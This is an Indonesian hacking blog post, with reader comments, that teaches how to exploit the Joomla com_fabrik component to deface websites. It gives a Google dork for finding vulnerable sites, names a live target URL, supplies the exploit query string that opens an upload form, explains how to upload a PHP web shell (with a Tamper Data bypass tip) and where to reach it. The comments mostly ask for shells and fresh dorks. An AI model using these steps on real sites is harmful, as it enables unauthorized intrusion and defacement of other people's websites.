Assalamualaikum....
Salam kompak Sobat IDCA,
Lanjut lagi Walking Blogg :D
Nah, kali ini saya cuma mau berbagi saja tentang Exploit Joomla, walaupun ini bugs lama, tapi masih bisa juga digunakan untuk depes2,, wkwkwk :D
Sebelumnya sedikit Nasihat dari saya :
"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Oke, langsung aja... Berikut langkah2nya:
Live Target: http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0
1. Gunakan Dork untuk mencari Target di Google
inurl:index.php?option=com_fabrik
2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D
3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:
4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV
Note: Kalo ga bisa upload ext. PHP coba gunakan Tamper data, tapi kalo ga bisa juga coba aja upload file .html, .txt :)
5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php
Note: Kalo ga berhasil atau error, cari target lain aja :D
7. Goodluck! :p
Video Tutorial
Content Created By Onix AQua
kok muncul tulisan "File must csv"
ReplyDeleteCari target lain aja :D
Deleteyg di upload ke csv.y script deface an kita ea gan
ReplyDeleteShell backdoor............
Deletegan mnta shell backdoor
Deletethx bnget
ReplyDeleteni yang gua cri
:D
sLAM DeVil-BlacK J (sory pke anonym gy cpek buka blog)
haha oke :D
Deletekalau berhasil tulisannya apa?
Deleten shellnya pakai apa?
kalau dah diupload
ReplyDeletebuka ..../media gk bsa
tlong pencerahan
web ga vuln itu om,, jdi cri trget yg bner2 bsa di eksekusi klo shellnya udh diupload.. :)
Deleteshell backdoor yg versi berapa Gan banyak nie macamnya tolong pencerahanya donk NewBy nie.... Pertamax
ReplyDeletegan bentuk csv itu apa sih?
ReplyDeleteLOOOL !
DeleteBanyak yg udh gk bsa -_-
ReplyDeleteMinta Dorknya lagi dong -_-
ReplyDeletePembohongan publik -_-
ReplyDeletekarna tk mampu makanya bisa mengatakn itu ^_^
Deletepdhal teknik ini masih dipake ma para defacer... :p
#bocah
Pembohongan publik apaan ?
Deleteane uda dapet 15 web :V
LOL
Cius nih gan kagak ngarti nih
DeleteNote: Kalo ga berhasil atau error, cari target lain aja :D
Deletedisini gak ada namanya pembohongan :D
orang udah di test sama admin kok :D
bro kalo berhasil diupload shellnya gmana gmbarnya???
ReplyDeletesimple aja om, klo udh upload shellnya, coba aja eksekusi shell, klo bisa, berarti upload brhasil, klo ga coba cri lgi dah trget yg lain :D
Deletesip bro,thanks :D
ReplyDelete:-)
Deletewaktu sudah di upload tapi ,, waktu buka site/media ga ada (blank) knp to
ReplyDeleteitu tandanya udah di patch :D
DeleteOm Bimo , Kok Habis Upload Shell Kok Shellnya Ga Bisa Di Akses , Apa Salah ? Apa Webnya no vuln ya ? ;( ;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(
ReplyDelete(maaf Spam Detected )
Bos tolong buatin videobya donk ane masih bingung cara upload shell ;((
ReplyDeletedan ini juga maksudnya apa ? Note: Kalo ga bisa upload ext. PHP coba gunakan Tamper data, tapi kalo ga bisa juga coba aja upload file .html, .txt
:>) :>) :>) :>)
gan bagi shell dong (o)
ReplyDelete500 -error: 500 :v v
ReplyDeleteOm Minta Dork yang Fresh Dong ..
ReplyDelete